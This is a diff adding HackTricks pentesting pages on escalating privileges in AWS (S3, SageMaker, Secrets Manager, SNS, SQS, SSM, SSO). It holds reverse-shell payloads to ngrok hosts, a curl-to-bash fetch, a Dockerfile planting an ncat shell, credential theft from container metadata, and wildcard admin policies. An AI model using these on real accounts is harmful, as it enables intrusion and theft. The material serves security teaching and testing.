Several services inside AWS (and outside of it) use S3 storage to store **config files**.\ +An attacker with **read access** to them might find **sensitive information** on them.\ +An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\ +These are some examples: + +* If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**. + +### `s3:PutBucketPolicy` + +An attacker, that needs to be **from the same account**, if not the error `The specified method is not allowed will trigger`, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets. + +```bash +# Update Bucket policy +aws s3api put-bucket-policy --policy file:///root/policy.json --bucket + +## JSON giving permissions to a user and mantaining some previous root access +{ + "Id": "Policy1568185116930", + "Version":"2012-10-17", + "Statement":[ + { + "Effect":"Allow", + "Principal":{ + "AWS":"arn:aws:iam::123123123123:root" + }, + "Action":"s3:ListBucket", + "Resource":"arn:aws:s3:::somebucketname" + }, + { + "Effect":"Allow", + "Principal":{ + "AWS":"arn:aws:iam::123123123123:user/username" + }, + "Action":"s3:*", + "Resource":"arn:aws:s3:::somebucketname/*" + } + ] +} + +## JSON Public policy example +### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS +{ + "Id": "Policy1568185116930", + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "Stmt1568184932403", + "Action": [ + "s3:ListBucket" + ], + "Effect": "Allow", + "Resource": "arn:aws:s3:::welcome", + "Principal": "*" + }, + { + "Sid": "Stmt1568185007451", + "Action": [ + "s3:GetObject" + ], + "Effect": "Allow", + "Resource": "arn:aws:s3:::welcome/*", + "Principal": "*" + } + ] +} +``` + +### `s3:GetBucketAcl`, `s3:PutBucketAcl` + +An 
attacker could abuse these permissions to **grant him more access** over specific buckets.\ +Note that the attacker doesn't need to be from the same account. Moreover the write access + +```bash +# Update bucket ACL +aws s3api get-bucket-acl --bucket +aws s3api put-bucket-acl --bucket --access-control-policy file://acl.json + +##JSON ACL example +## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. +{ + "Owner": { + "DisplayName": "", + "ID": "" + }, + "Grants": [ + { + "Grantee": { + "Type": "Group", + "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" + }, + "Permission": "FULL_CONTROL" + } + ] +} +## An ACL should give you the permission WRITE_ACP to be able to put a new ACL +``` + +### `s3:GetObjectAcl`, `s3:PutObjectAcl` + +An attacker could abuse these permissions to grant him more access over specific objects inside buckets. + +```bash +# Update bucket object ACL +aws s3api get-object-acl --bucket --key flag +aws s3api put-object-acl --bucket --key flag --access-control-policy file://objacl.json + +##JSON ACL example +## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. 
+{ + "Owner": { + "DisplayName": "", + "ID": "" + }, + "Grants": [ + { + "Grantee": { + "Type": "Group", + "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" + }, + "Permission": "FULL_CONTROL" + } + ] +} +## An ACL should give you the permission WRITE_ACP to be able to put a new ACL +``` + +### `s3:GetObjectAcl`, `s3:PutObjectVersionAcl` + +An attacker with these privileges is expected to be able to put an Acl to an specific object version + +```bash +aws s3api get-object-acl --bucket --key flag +aws s3api put-object-acl --bucket --key flag --version-id --access-control-policy file://objacl.json +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
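Review bot: the `s3:GetBucketAcl`, `s3:PutBucketAcl` section ends with an unfinished sentence, "Moreover the write access", which should be completed or removed. In the `s3:PutBucketPolicy` paragraph the backticks are misplaced: "if not the error `The specified method is not allowed will trigger`" should quote only the error text, e.g. "otherwise the error `The specified method is not allowed` is returned". The Pacu link text `cfn__resouce_injection` does not match the URL (`cfn__resource_injection`), and "For mor informatino" should be "For more information". The commands have lost their bucket placeholders (`--bucket` with no value in the policy, ACL and object-ACL examples), and "put an Acl to an specific object version" should be "put an ACL on a specific object version". The ACL examples grant `FULL_CONTROL` to the `AuthenticatedUsers` group, i.e. to any AWS account; since the bucket-policy section already notes that Block Public Access makes the public policy fail, the ACL sections should carry the matching caveat that buckets with Object Ownership set to bucket owner enforced have ACLs disabled, which is the control that neutralises both the `PutBucketAcl` and the `PutObjectAcl` technique.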
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md new file mode 100644 index 0000000000..b795ce1ff4 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -0,0 +1,141 @@ +# AWS - Sagemaker Privesc + +## AWS - Sagemaker Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` + +Start creating a noteboook with the IAM Role to access attached to it: + +```bash +aws sagemaker create-notebook-instance --notebook-instance-name example \ + --instance-type ml.t2.medium \ + --role-arn arn:aws:iam:::role/service-role/ +``` + +The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready: + +```bash +aws sagemaker create-presigned-notebook-instance-url \ + --notebook-instance-name +``` + +Navigate to the URL with the browser and click on \`Open JupyterLab\`\` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button. + +Now It's possible to access the metadata credentials of the IAM Role. + +**Potential Impact:** Privesc to the sagemaker service role specified. + +### `sagemaker:CreatePresignedNotebookInstanceUrl` + +If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**. + +```bash +aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name +``` + +**Potential Impact:** Privesc to the sagemaker service role attached. + +### `sagemaker:CreateProcessingJob,iam:PassRole` + +An attacker with those permissions can make **sagemaker execute a processingjob** with a sagemaker role attached to it. The attacked can indicate the definition of the container that will be run in an **AWS managed ECS account instance**, and **steal the credentials of the IAM role attached**. 
+ +```bash +# I uploaded a python docker image to the ECR +aws sagemaker create-processing-job \ + --processing-job-name privescjob \ + --processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \ + --app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ + --role-arn + +# In my tests it took 10min to receive the shell +curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds +``` + +**Potential Impact:** Privesc to the sagemaker service role specified. + +### `sagemaker:CreateTrainingJob`, `iam:PassRole` + +An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role. + +{% hint style="warning" %} +This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). + +```bash +# Create docker image +mkdir /tmp/rev +## Note that the trainning job is going to call an executable called "train" +## That's why I'm putting the rev shell in /bin/train +## Set the values of and +cat > /tmp/rev/Dockerfile < -e /bin/sh' > /bin/train +RUN chmod +x /bin/train +CMD ncat -e /bin/sh +EOF + +cd /tmp/rev +sudo docker build . 
-t reverseshell + +# Upload it to ECR +sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/ +sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest +sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest +``` +{% endhint %} + +```bash +# Create trainning job with the docker image created +aws sagemaker create-training-job \ + --training-job-name privescjob \ + --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \ + --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \ + --role-arn \ + --output-data-config '{"S3OutputPath": "s3://"}' \ + --stopping-condition '{"MaxRuntimeInSeconds": 600}' + +#To get the creds +curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" +## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer +``` + +**Potential Impact:** Privesc to the sagemaker service role specified. + +### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole` + +An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\ +&#xNAN;_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ + +## References + +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md new file mode 100644 index 0000000000..8be266ddb6 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md @@ -0,0 +1,75 @@ +# AWS - Secrets Manager Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Secrets Manager + +For more info about secrets manager check: + +{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} +[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) +{% endcontent-ref %} + +### `secretsmanager:GetSecretValue` + +An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**. + +```bash +aws secretsmanager get-secret-value --secret-id # Get value +``` + +**Potential Impact:** Access high sensitive data inside AWS secrets manager service. + +### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`) + +With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)). + +```bash +aws secretsmanager list-secrets +aws secretsmanager get-resource-policy --secret-id +aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json +``` + +policy.json: + +```json +{ + "Version" : "2012-10-17", + "Statement" : [ { + "Effect" : "Allow", + "Principal" : { + "AWS" : "arn:aws:iam:::root" + }, + "Action" : "secretsmanager:GetSecretValue", + "Resource" : "*" + } ] +} +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md new file mode 100644 index 0000000000..bdbe2bea2e --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md @@ -0,0 +1,71 @@ +# AWS - SNS Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SNS + +For more information check: + +{% content-ref url="../aws-services/aws-sns-enum.md" %} +[aws-sns-enum.md](../aws-services/aws-sns-enum.md) +{% endcontent-ref %} + +### `sns:Publish` + +An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. + +```bash +aws sns publish --topic-arn --message +``` + +**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. + +### `sns:Subscribe` + +An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. + +{% code overflow="wrap" %} +```bash +aws sns subscribe --topic-arn --protocol --endpoint +``` +{% endcode %} + +**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic. + +### `sns:AddPermission` + +An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions. + +```css +aws sns add-permission --topic-arn --label --aws-account-id --action-name +``` + +**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md new file mode 100644 index 0000000000..258084f11c --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md @@ -0,0 +1,74 @@ +# AWS - SQS Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SQS + +For more information check: + +{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} +[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) +{% endcontent-ref %} + +### `sqs:AddPermission` + +An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities. + +{% code overflow="wrap" %} +```bash +cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label +``` +{% endcode %} + +**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. + +### `sqs:SendMessage` , `sqs:SendMessageBatch` + +An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. + +```bash +aws sqs send-message --queue-url --message-body +aws sqs send-message-batch --queue-url --entries +``` + +**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. + +### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` + +An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. + +```bash +aws sqs receive-message --queue-url +aws sqs delete-message --queue-url --receipt-handle +aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout +``` + +**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md new file mode 100644 index 0000000000..f496e89a32 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md @@ -0,0 +1,159 @@ +# AWS - SSM Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SSM + +For more info about SSM check: + +{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} +[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) +{% endcontent-ref %} + +### `ssm:SendCommand` + +An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it. + +```bash +# Check for configured instances +aws ssm describe-instance-information +aws ssm describe-sessions --state Active + +# Send rev shell command +aws ssm send-command --instance-ids "$INSTANCE_ID" \ + --document-name "AWS-RunShellScript" --output text \ + --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash" +``` + +In case you are using this technique to escalate privileges inside an already compromised EC2 instance, you could just capture the rev shell locally with: + +```bash +# If you are in the machine you can capture the reverseshel inside of it +nc -lvnp 4444 #Inside the EC2 instance +aws ssm send-command --instance-ids "$INSTANCE_ID" \ + --document-name "AWS-RunShellScript" --output text \ + --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" +``` + +**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. + +### `ssm:StartSession` + +An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it. 
+ +```bash +# Check for configured instances +aws ssm describe-instance-information +aws ssm describe-sessions --state Active + +# Send rev shell command +aws ssm start-session --target "$INSTANCE_ID" +``` + +{% hint style="danger" %} +In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) +{% endhint %} + +**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. + +#### Privesc to ECS + +When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\ +According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)\ +Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running: + +```bash +aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID" +``` + +![](<../../../.gitbook/assets/image (185).png>) + +**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled. + +### `ssm:ResumeSession` + +An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it. 
+ +```bash +# Check for configured instances +aws ssm describe-sessions + +# Get resume data (you will probably need to do something else with this info to connect) +aws ssm resume-session \ + --session-id Mary-Major-07a16060613c408b5 +``` + +**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions. + +### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`) + +An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys. + +```bash +aws ssm describe-parameters +# Suppose that you found a parameter called "id_rsa" +aws ssm get-parameters --names id_rsa --with-decryption +aws ssm get-parameter --name id_rsa --with-decryption +``` + +**Potential Impact:** Find sensitive information inside the parameters. + +### `ssm:ListCommands` + +An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them. + +``` +aws ssm list-commands +``` + +**Potential Impact:** Find sensitive information inside the command lines. + +### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`) + +An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it. + +```bash +# You can use any of both options to get the command-id and instance id +aws ssm list-commands +aws ssm list-command-invocations + +aws ssm get-command-invocation --command-id --instance-id +``` + +**Potential Impact:** Find sensitive information inside the output of the command lines. 
+ +### Codebuild + +You can also use SSM to get inside a codebuild project being built: + +{% content-ref url="aws-codebuild-privesc.md" %} +[aws-codebuild-privesc.md](aws-codebuild-privesc.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md new file mode 100644 index 0000000000..cef6c3dc84 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md @@ -0,0 +1,180 @@ +# AWS - SSO & identitystore Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS Identity Center / AWS SSO + +For more information about AWS Identity Center / AWS SSO check: + +{% content-ref url="../aws-services/aws-iam-enum.md" %} +[aws-iam-enum.md](../aws-services/aws-iam-enum.md) +{% endcontent-ref %} + +{% hint style="warning" %} +Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\ +Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\ +[Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) +{% endhint %} + +### ~~Reset Password~~ + +An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email. + +### `identitystore:CreateGroupMembership` + +With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has. 
+ +{% code overflow="wrap" %} +```bash +aws identitystore create-group-membership --identity-store-id --group-id --member-id UserId= +``` +{% endcode %} + +### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet` + +An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control + +{% code overflow="wrap" %} +```bash +# Set an inline policy with admin privileges +aws sso-admin put-inline-policy-to-permission-set --instance-arn --permission-set-arn --inline-policy file:///tmp/policy.yaml + +# Content of /tmp/policy.yaml +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "Statement1", + "Effect": "Allow", + "Action": ["*"], + "Resource": ["*"] + } + ] +} + +# Update the provisioning so the new policy is created in the account +aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS +``` +{% endcode %} + +### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet` + +An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control + +{% code 